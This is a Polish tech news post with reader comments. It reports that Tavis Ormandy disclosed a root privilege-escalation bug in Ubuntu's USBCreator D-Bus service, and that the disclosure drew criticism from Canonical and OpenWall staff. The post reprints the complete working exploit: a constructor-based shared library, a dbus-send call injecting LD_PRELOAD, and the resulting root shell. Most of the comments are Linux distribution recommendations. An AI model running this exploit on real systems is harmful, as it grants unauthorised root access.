Security - bezpieczeństwo
Na liście dyskusyjnej OSS Security, Tavis Ormandy opublikował przykładowy kod exploita, który umożliwia uzyskanie praw roota na czystej instalacji systemu Ubuntu. Błąd znajduje się w usłudze D-Bus. Okazuje się także, że autor otrzymał ostrą reprymendę od Seth Arnold i Marc Deslauriers z Canonical oraz Solar Designer z OpenWall za publiczne ujawnienie tego typu podatności. Według założeń polityki bezpieczeństwa firmy Canonical, tego typu luki posiadają wysoki priorytet i są objęte embargiem tajności. Kurt Seifried z Red Hata oznajmił także, że będzie omawiał osobiście błąd i ewentualne poprawki z Tavisem Ormandy.

Poniżej przykładowy exploit:

$ cat > test.c
void __attribute__((constructor)) init (void)
{
chown("/tmp/test", 0, 0);
chmod("/tmp/test", 04755);
}
^D
$ gcc -shared -fPIC -o /tmp/test.so test.c
$ cp /bin/sh /tmp/test
$ dbus-send --print-reply --system --dest=com.ubuntu.USBCreator
/com/ubuntu/USBCreator com.ubuntu.USBCreator.KVMTest string:/dev/sda
dict:string:string:DISPLAY,"foo",XAUTHORITY,"foo",LD_PRELOAD,"/tmp/test.so"
method return sender=:1.4364 -> dest=:1.7427 reply_serial=2
$ ls -l /tmp/test
-rwsr-xr-x 1 root root 121272 Apr 22 16:43 /tmp/test
$ /tmp/test
# id
euid=0(root) groups=0(root)

Warto zapoznać się z całym tematem na liście dyskusyjnej.

  • helloworld

    Pod warunkiem że delikwenta dopuścimy do maszyny.

    • asd

      Sprytnie! Problem rozwiązany.

    • o_O

      Przecież przez ssh to też zadziała. Wystarczy mieć konto.

  • Hoszin

    A jakiego byście linuxa zabronowali bo codziennego użytku ? Używałem trochę ubuntu i jak coś mogę się pobawić konfiguracją, ale by to nie zajmowało 3 dni.

    • Rethil

      openSUSE – używam już ponad 3 lata i jestem bardzo zadowolony.

    • smaniek

      Arch Panie, Arch. Używam ponad 2 lata z małymi przerwami na archopodobne Manjaro i Netrunnera ale wróciłem i jak na razie ani myślę się przesiadać. Wadą jest to że na początku trzeba włożyć trochę czasu i cierpliwości w zainstalowanie wszystkiego i poustawianie ale potem jest non stop aktualny system. Zdarza się że po jakiejś aktualizacji coś się schrzani (np. ostatnio systemd 219 mi trochę namieszał) ale robię aktualizacje średnio raz na tydzień żeby nie było za dużo “nowości” w systemie na raz a przed każdą snapszota (root na btrfs) i jak coś się okazuje nie tak to rollback i czekam aż poprawią. Jak nie masz zacięcia do grzebania w systemie to Manjaro/Netrunner. Ja zrezygnowałem z nich tylko dlatego że jak dla mnie mają za dużo rzeczy domyślnie poinstalowane i jak miałem poświęcić czas na usuwanie tego co mi nie pasuje, instalowanie tego co mi pasuje i ustawianie po swojemu to wolałem to samo zrobić na czystym Archu.

    • Darek

      Przecież kolega napisał że nie chce bawić się w długie konfiguracje, ma się dać zainstalować i po prostu działać.

      Polecam Linux Mint – bardzo przyzwoity i prosty w obsłudze system który nie wymaga praktycznie żadnych zmian domyślnych ustawień.

    • smaniek

      Cytuje: “Jak nie masz zacięcia do grzebania w systemie to Manjaro/Netrunner.”
      To jest odpowiedź na pytanie kolegi + rozwinięcie w jaki sposób mam to rozwiązane u siebie w razie gdyby jednak chciał skorzystać. Nie ma nigdy nic za darmo, albo masz system out of the box z mnóstwem niepotrzebnych pakietów albo robisz pod siebie. Dałem mu swoje propozycje albo skorzysta albo nie.

    • jaras67

      Arch

    • misiek

      Od 7 lat siedzę na ubuntu. Ostatnio instalowałem na laptopie wersję stąd:
      http://ubuntu.pl/pobierz.php
      Z długim wsparciem (LT). Polecam. Po instalacji na pulpicie jest przewodnik i prosty konfigurator.

    • Ollbi

      A ja polecam system Windows. 4 lata siedziałem na Ubuntu i mam go serdecznie dość, jeżeli chodzi o desktop. Na serwerach czasami się sprawdza, aczkolwiek lepszy jest CentOS :-)

    • KhazAkar

      Debian sid z netboota(podstawowy system,kompletnie minimalny,instalujesz co tylko chcesz) lub SparkyLinux(mniej konfiguracji,więcej typowego używania)

  • The PolishGamer

    Fanboye twierdzą że takie coś jest nie możliwe. Twierdza nie do zdobycia i takie tam.